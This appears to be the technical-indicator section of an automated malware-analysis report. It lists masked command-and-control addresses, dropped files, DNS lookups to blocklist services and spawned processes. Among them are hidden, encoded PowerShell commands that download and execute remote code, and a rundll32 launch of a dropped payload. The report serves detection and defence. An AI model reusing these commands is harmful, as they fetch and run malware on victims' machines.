Technical Information
- http://14#.#8.106.202/incredible.php
- <SYSTEM32>\wermgr.exe
- %WINDIR%\syswow64\cmd.exe
- %TEMP%\mhcbpixseeoqolrp.bin
- '14#.#8.106.202':80
- '18#.#6.175.122':443
- 'microsoft.com':80
- 'ip##fo.io':80
- http://14#.#8.106.202/zoom.doc
- '18#.#6.175.122':443
- DNS ASK microsoft.com
- DNS ASK ip##fo.io
- DNS ASK 19#.###.#11.95.zen.spamhaus.org
- DNS ASK 19#.###.#11.95.cbl.abuseat.org
- DNS ASK 19#.###.###.95.b.barracudacentral.org
- '<SYSTEM32>\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA0...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA0...
- '<SYSTEM32>\rundll32.exe' %TEMP%\MhCBpiXseEOqoLrP.bin StartW
- '<SYSTEM32>\wermgr.exe'